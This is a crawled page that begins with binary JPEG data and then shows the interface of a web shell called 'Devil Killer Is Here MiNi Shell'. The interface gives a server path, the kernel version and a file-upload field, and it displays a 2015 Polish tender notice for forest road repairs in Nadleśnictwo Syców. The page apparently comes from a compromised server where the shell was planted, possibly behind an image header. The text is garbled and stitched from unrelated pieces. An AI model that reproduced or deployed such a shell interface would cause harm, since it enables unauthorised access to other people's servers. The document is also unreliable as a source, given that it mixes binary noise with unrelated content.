JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150801/115203-N-2015.html

<p class="kh_header"><b>Syców: SA.270.13.2015 roboty budowlane polegające na utrzymaniu i remoncie dróg leśnych w Nadleśnictwie Syców  w roku 2015 z podziałem na zadania.</b><br>
<b>Numer ogłoszenia: 115203 - 2015; data zamieszczenia: 01.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Syców , ul. Kolejowa 14, 56-500 Syców, tel. (0-62) 7852127, faks (0-62) 7869032.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nieposiadajaca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SA.270.13.2015 roboty budowlane polegające na utrzymaniu i remoncie dróg leśnych w Nadleśnictwie Syców  w roku 2015 z podziałem na zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót  budowlanych polegających na utrzymaniu i remoncie dróg leśnych w Nadleśnictwie Syców w roku 2015 z podziałem na zadania.

Zamawiający podzielił zamówienie na 2 zadania zwane dalej Pakietami tj.:
Pakiet nr 1 -  Utrzymanie dróg w obrębach leśnych Bralin, Rychtal.
Pakiet nr 2 - Remont czterech dróg w obrębie leśnym Syców o nr inwentarzowych 220/1203, 220/1276, 220/1295, 220/1296  w leśnictwach: Bukowina, Wioska, Drołtowice.
1.	Zakres przedmiotu zamówienia dla zadania - Pakietu 1-2 obejmuje następujące roboty:
1.1 Naprawie  (1m2) nawierzchni gruntowych 
1.2 Naprawie (1m2) nawierzchni z kamienia o  gr. 10 cm,
1.3. Uzupełnieniu kamieniem łamanym (1m3)  ubytków w nawierzchni kamiennej i gruntowej,
1.4. Wykonaniu (1mb) przepustu  z rur betonowych o średnicy 50 cm. wraz z niezbędnymi robotami  ziemnymi,
1.5. Wykonanie 1 komplet  (2 szt.) ścianek czołowych betonowych dla przepustu o średnicy 50 cm,
1.6. Oczyszczanie (1 mb) rowu z namułu o grubości  do 20 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 0,6 m,
1.7. Oczyszczanie (1 mb) rowu z namułu o grubości  do 40 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 0,6 m,
1.8. Oczyszczanie (1 mb) rowu z namułu o grubości  do 20 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 1 m,
1.9. Oczyszczanie (1 mb) rowu z namułu o grubości  do 40 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 1 m.

Kod CPV   45 23 32 20-7, 45233140-2
Jeżeli w dokumentacji przetargowej występują nazwy konkretnych produktów, wyrobów lub określenie sugerujące wyroby konkretnych firm, Wykonawca winien uznać, iż podano produkty przykładowe, a Zamawiający dopuszcza możliwość zastosowania produktów, wyrobów, materiałów równoważnych o właściwościach, parametrach nie gorszych niż określone w dokumentacji.. Dopuszcza się zastosowanie rozwiązań równoważnych w stosunku do opisanych norm, aprobat i systemów odniesienia.


2. Ogólne wymagania dotyczące robót:
2.1. Wykonawca robót jest odpowiedzialny za jakość ich wykonania . 
Prace należy prowadzić zgodnie z wytycznymi zawartymi w dokumentacji projektowej 
i specyfikacji technicznej wykonania i odbioru robót, obowiązującymi przepisami 
i normami, zasadami sztuki budowlanej oraz warunkami technicznymi wykonania  
i odbioru robót. 
2.2. W czasie prowadzenia robót budowlanych Wykonawca, w ramach ceny ofertowej, zobowiązany będzie do:
1)	urządzenia zaplecza w miejscu uzgodnionym z Zamawiającym, zabezpieczenia terenu objętego robotami budowlanymi oraz przed dostępem osób postronnych, 
2)	potwierdzania każdorazowo u właściwego terytorialnie leśniczego lub osoby go zastępującej, ilości dostarczanego kruszywa,
3)	prowadzenia robót zgodnie z zakresem przewidzianym w specyfikacji technicznej wykonania i odbioru robót budowlanych w przedmiarze robót,  obowiązującymi normami i przepisami oraz zasadami sztuki budowlanej,

4)	wykonania przedmiotu umowy, przy użyciu własnych materiałów, zgodnie z umową, zasadami wiedzy technicznej i przepisami prawa  oraz z zastosowaniem  materiałów budowlanych oraz urządzeń i sprzętu posiadającego:
- certyfikaty na znak bezpieczeństwa,
- aprobaty techniczne,
- certyfikaty zgodności lub deklaracje zgodności,
- atesty.
- Wykonawca pokryje koszty badania jakości wbudowywanego kruszywa w niezależnym laboratorium  wskazanym przez Zamawiającego.,
- niezależnie od powyższych badań Zamawiający zastrzega sobie prawo do pobierania, w trakcie realizacji robót, próbek wbudowywanego kruszywa i przebadaniu go, na koszt własny w niezależnym laboratorium.
5)	postępowania z odpadami powstałymi w trakcie realizacji przedmiotu umowy zgodnie z zapisami Ustawy  o odpadach  i Ustawy  Prawo ochrony środowiska . 
6)	zorganizowania, zagospodarowania i zabezpieczenia terenu budowy  z zachowaniem należytej staranności, w tym zachowania porządku na terenie budowy,
7)	ochrony mienia znajdującego się na terenie budowy, 
8)	natychmiastowego usunięcia wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót,
9)	przerwania robót na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonania robót przed ich zniszczeniem, 
10)	 zabezpieczenia obrębu prowadzenia robót w sposób zapewniający bezpieczeństwo.
11)	 poszanowania występujących w obszarze oddziaływania obiektu uzasadnionych interesów osób trzecich. 
12)	wykonania przed zgłoszeniem przedmiotu umowy do odbioru, wszystkich niezbędnych prób, odbiorów i badań z wynikiem pozytywnym, 
13)	uporządkowania terenu po zakończeniu robót oraz przekazanie go Zamawiającemu w terminie nie późniejszym niż termin odbioru końcowego robót, ,
14)	przywrócenia uszkodzonych dróg leśnych dojazdowych, po których odbywał się transport kruszyw oraz maszyn budowlanych  do stanu z przed rozpoczęcia ich użytkowania, 
15)	uczestniczenia w czynnościach odbioru, usunięcia stwierdzonych wad, przekazania wymaganych atestów i zaświadczeń, 
16)	zgłoszenia w formie pisemnej gotowości do odbioru ostatecznego na piętnaście (15) dni przed upływem okresu gwarancji i rękojmi za wady.

2.3. Cena oferty musi zawierać wszelkie koszty niezbędne do zrealizowania zamówienia, będą to m.in. następujące koszty:
1)  wszystkich obowiązków kierownika budowy;
2)  transportu, montażu i dostaw;
3)  wszelkich robót przygotowawczych, porządkowych, odtworzeniowych;
4) koszty związane z odbiorami robót, w tym wszelkich badań powykonawczych wymaganych przepisami;
5) opłaty 
7) inne koszty wynikające z zawartej umowy oraz koszty wszelkich innych czynności niezbędnych do wykonania przedmiotu zamówienia.
Skutki finansowe jakichkolwiek błędów obciążają Wykonawcę zamówienia. W związku z powyższym wymagane jest od Wykonawców bardzo szczegółowe sprawdzenie w terenie warunków wykonania zamówienia. Wykonawca musi przewidzieć wszystkie okoliczności mające wpływ na cenę zamówienia. Zamawiający zaleca dokonanie wizji na placu budowy przed przystąpieniem do przygotowania oferty, zdobycia wszelkich  informacji , które mogą być konieczne do przygotowania oferty i podpisania umowy.
2.4. Pozostałe wymagania
1) roboty wykonywane będą na podstawie zleceń częściowych, wystawianych przez Zamawiającego;
2)	szczegółowa lokalizacja robót naprawczych wg wskazań  zamawiającego ,
3)	po wykonaniu zakresu zamówienia częściowego oraz uprzątnięciu terenu robót, Wykonawca zgłasza na piśmie roboty do odbioru, załączając do zgłoszenia obmiar wykonanych robót.  Jednostkami obmiarowymi są jednostki określone w Rozdziale II SIWZ pkt 1.1. do 1.10.
4)	Wykonawca we własnym zakresie i w cenie oferty utrzyma w ciągłej czystości jezdnię i dojazdy do posesji w czasie prowadzenia prac;
5)	Wszystkie prace objęte przetargiem należy wykonać przy zachowaniu ruchu kołowego.
6)	Zamawiający zastrzega sobie prawo zmiany  ilości  zlecanych robót. Realizacja będzie uzależniona od stanu nawierzchni dróg i warunków atmosferycznych oraz możliwości finansowych Zamawiającego;
7)	Okres gwarancji na wykonane roboty wynosi  12 miesięcy;.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 PZP, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali min 2 zadania, odpowiadające swoim rodzajem i wartością robotom budowlanym będącym przedmiotem zamówienia polegających na remontach  nawierzchni  gruntowych i tłuczniowych    o wartości min. 100.000,00 zł brutto i dołączą dowody  potwierdzające, że wykazane  roboty zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie według reguły ,spełni-/nie spełnia, na podstawie złożonego oświadczenia i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykażą , że  dysponują narzędziami i urządzeniami technicznymi w celu realizacji zamówienia tj.:
- równiarka  samojezdna  74 kW (100KM) - 1 szt.
- walec  statyczny samojezdny 4-6 t - 1 szt.
- samochód ciężarowy samowyładowczy 1 szt.
     - walec  wibracyjny samojezdny - 1 szt.
    - koparko-spycharka - 1 szt.
    - betoniarka - 1 szt.
Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie według reguły spełnia-nie spełnia, na podstawie złożonego oświadczenia i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nrak</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin przystąpienia do realizacji robót - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia do umowy zawiera wzór umowy - załącznik nr 7 do SIWZ.
2. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty oraz określa warunki takiej zmiany, tj.: 
1. W stosunku do terminu realizacji umowy:
1)	zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności:
a)	 klęski żywiołowe;
b)	 warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 0 st. C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi;
c)	 niewypały i niewybuchy;
d)	 wykopaliska archeologiczne;
2)	zmiany będące następstwem działania organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.;
b)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń;
c)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, a w szczególności brak możliwości dojazdu oraz transportu materiałów na teren robót spowodowany awariami, remontami, przebudowami dróg dojazdowych oraz protestami mieszkańców z blokadą dróg.

2.	Zmiana sposobu spełnienia świadczenia - zmiany technologiczne, w szczególności:
a)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
c)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;  
d)	konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót,
e)	konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa. 
3.	Zmiany osobowe:
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w SIWZ.
b)	zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy;
c)	rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się Podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ. Zmiana ta nie może dotyczyć czynności, które zgodnie z SIWZ muszą być wykonane przez Wykonawcę osobiście. 
d)	zmiany osób do nadzorowania robót pod warunkiem posiadania co najmniej takich uprawnień co wymagane w SIWZ.
4.	 Pozostałe zmiany: 
a)	zmiana obowiązującej stawki VAT - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę;
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami; 
c)	inna niż wymienione siła wyższa (zdarzenie zewnętrzne, niemożliwe do przewidzenia i do zapobieżenia) uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ i dokumentacją.
d)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np.: powodują skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia);

5.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami;
c)	udzielenie zamówień dodatkowych/uzupełniających określonych w przepisach o zamówieniach publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sycow.poznan.lasy.gov.pl -<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.sycow.poznan.lasy.gov.pl -.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2015 godzina 14:00, miejsce: Syców, u. Kolejowa 14, 56-500 Syców - I piętro pokój nr 5 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> brak.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie dróg w obrębach leśnych Bralin, Rychtal..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres przedmiotu zamówienia dla zadania - Pakietu 1-2 obejmuje następujące roboty:
1.1 Naprawie  (1m2) nawierzchni gruntowych 
1.2 Naprawie (1m2) nawierzchni z kamienia o  gr. 10 cm,
1.3. Uzupełnieniu kamieniem łamanym (1m3)  ubytków w nawierzchni kamiennej i gruntowej,
1.4. Wykonaniu (1mb) przepustu  z rur betonowych o średnicy 50 cm. wraz z niezbędnymi robotami  ziemnymi,
1.5. Wykonanie 1 komplet  (2 szt.) ścianek czołowych betonowych dla przepustu o średnicy 50 cm,
1.6. Oczyszczanie (1 mb) rowu z namułu o grubości  do 20 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 0,6 m,
1.7. Oczyszczanie (1 mb) rowu z namułu o grubości  do 40 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 0,6 m,
1.8. Oczyszczanie (1 mb) rowu z namułu o grubości  do 20 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 1 m,
1.9. Oczyszczanie (1 mb) rowu z namułu o grubości  do 40 cm z wyprofilowaniem rowów z cieków o głębokości do 1 m szerokości dna do 1 m.

Kod CPV   45 23 32 20-7, 45233140-2
Jeżeli w dokumentacji przetargowej występują nazwy konkretnych produktów, wyrobów lub określenie sugerujące wyroby konkretnych firm, Wykonawca winien uznać, iż podano produkty przykładowe, a Zamawiający dopuszcza możliwość zastosowania produktów, wyrobów, materiałów równoważnych o właściwościach, parametrach nie gorszych niż określone w dokumentacji.. Dopuszcza się zastosowanie rozwiązań równoważnych w stosunku do opisanych norm, aprobat i systemów odniesienia.
